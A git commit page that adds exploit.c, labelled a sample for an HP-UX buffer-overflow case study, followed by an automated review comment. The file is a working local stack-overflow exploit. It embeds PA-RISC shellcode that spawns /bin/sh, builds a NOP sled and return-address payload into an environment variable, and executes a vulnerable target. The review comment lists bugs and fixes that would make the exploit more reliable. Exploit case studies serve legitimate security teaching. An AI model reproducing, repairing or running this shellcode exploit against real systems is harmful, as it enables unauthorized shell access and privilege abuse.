authorRoot THC2026-02-24 12:42:47 +0000
committerRoot THC2026-02-24 12:42:47 +0000
commitc9cbeced5b3f2bdd7407e29c0811e65954132540 (patch)
treeaefc355416b561111819de159ccbd86c3004cf88 /other/shellkit/tmp/hpux-tools/sample-one/exploit.c
parent073fe4bf9fca6bf40cef2886d75df832ef4b6fca (diff)
initial
Diffstat (limited to 'other/shellkit/tmp/hpux-tools/sample-one/exploit.c')
-rw-r--r--other/shellkit/tmp/hpux-tools/sample-one/exploit.c123
1 files changed, 123 insertions, 0 deletions
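--- /dev/null
+++ b/other/shellkit/tmp/hpux-tools/sample-one/exploit.c
@@ -0,0 +1,123 @@
+/*
+ * Sample exploit for HP-UX buffer overflows case study
+ */
+#include <stdio.h>
+#include <unistd.h>
+
+
+char shellcode[]=
+"\xe8\x3f\x1f\xfd\xb4\x23\x03\xe8\x60\x60\x3c\x61\x0b\x39\x02"
+"\x99\x34\x1a\x3c\x53\x0b\x43\x06\x1a\x20\x20\x08\x01\x34\x16\x03"
+"\xe8\xe4\x20\xe0\x08\x96\xd6\x03\xfe/bin/shA";
+
+#define BUFFER_SIZE 180
+#define STACK_DSO -84
+#define NOP 0x0b390280
+#define PAD 0
+#define ALIGN 8
+#define ADB_PATH "/usr/bin/adb"
+#define VULNVAR "VULNBUF="
+#define MORE 1
+
+
+unsigned long get_sp(void)
+{
+ __asm__("copy %sp,%ret0 \n");
+}
+
+int main(int argc, char **argv) {
+int i, dso, align, padd, buf_size, adb, more;
+char *buf, *ptr;
+unsigned long retaddr;
+
+
+dso = STACK_DSO;
+align = ALIGN;
+padd = PAD;
+buf_size = BUFFER_SIZE;
+retaddr = 0;
+more = MORE;
+
+
+
+
+while ((i = getopt(argc, argv,
+ "Dd:b:r:o:a:p:m:")) != EOF) {
+ switch (i) {
+ case 'd':
+ dso=(int) strtol(optarg, NULL, 0);
+ break;
+ case 'm':
+ more+=(int) strtol(optarg, NULL, 0);
+ break;
+ case 'b':
+ buf_size=(int)strtol(optarg, NULL, 0);
+ break;
+ case 'r':
+ retaddr = strtoul(optarg, NULL, 0);
+ break;
+ case 'a':
+ align = (int) strtol(optarg, NULL, 0);
+ break;
+ case 'p':
+ padd = (int) strtol(optarg, NULL, 0);
+ break;
+ case 'D':
+ adb = 1;
+ break;
+ default:
+ fprintf(stderr, "usage: %s [-b buffer_size] [-d dso] "
+ "[-r return_address]"
+ "[-a align] [-p pad] [-D] [-m more_rets]\n", argv[0]);
+ exit(1);
+ break;
+ }
+}
+
+
+buf=(char *)calloc(strlen(VULNVAR) + buf_size
+ + sizeof(unsigned long)*more + 1, 1);
+ptr=buf;
+if (!buf) {
+ perror("calloc");
+ exit(1);
+}
+
+fprintf(stderr,"our stack %X\n",get_sp());
+if (!retaddr)
+ retaddr=get_sp()- dso + 3;
+fprintf(stderr, "Using: ret: 0x%X pad: %i align: %i"
+ " buf_len: %i dso: %i more: %i\n",
+ retaddr, padd, align, buf_size, dso, more);
+
+strcpy(buf, VULNVAR);
+ptr+=strlen(VULNVAR);
+for(i=0;i<align; i++) *ptr++='A'; // fill in alignment
+
+for(i=0;i<(buf_size-strlen(shellcode)-align-padd)/4;i++) { // fill in some nops
+ *ptr++=(NOP>>24)&0xff;
+ *ptr++=(NOP>>16)&0xff;
+ *ptr++=(NOP>>8)&0xff;
+ *ptr++=(NOP)&0xff;
+}
+
+strcat(buf, shellcode); // append shellcode
+ptr+=strlen(shellcode);
+
+for(i=0;i<padd; i++) *ptr++='B'; // padd
+
+for (i=0;i<more ; i++) {
+ *ptr++=(retaddr>>24)&0xff;
+ *ptr++=(retaddr>>16)&0xff;
+ *ptr++=(retaddr>>8)&0xff;
+ *ptr++=(retaddr)&0xff;
+}
+fprintf(stderr,"buflen is %i\n", strlen(buf));
+putenv(buf,1);
+if (adb)
+ execl(ADB_PATH,"adb","vuln", NULL);
+else
+ execl("./vuln","vuln",buf, NULL);
+perror("execl");
+return 0; // uff
+}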
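Review bot: `adb` is declared at the top of main but only ever assigned in the `'D'` case of the getopt switch, so the `if (adb)` before the execl reads an uninitialized automatic variable (undefined behaviour; which binary gets executed may depend on whatever is on the stack) — initialize it alongside the other defaults, `adb = 0;`. The file includes only stdio.h and unistd.h, so strtol, strtoul, calloc, exit, strlen, strcpy, strcat and putenv are all implicitly declared; adding `#include <stdlib.h>` and `#include <string.h>` would also make the compiler reject `putenv(buf,1);`, which passes a second argument putenv does not take (`putenv(buf);`). The NOP loop bound `(buf_size-strlen(shellcode)-align-padd)/4` is evaluated in size_t because strlen returns unsigned, so a `-b` value smaller than the shellcode length plus align and pad wraps to a huge count and the loop writes far past the calloc'd buffer; compute the remaining length in a signed type and reject it when negative before the loop. Separately, `get_sp` is a non-void function with no return statement, and the `%X` conversions are fed unsigned long arguments where `%lX` is required.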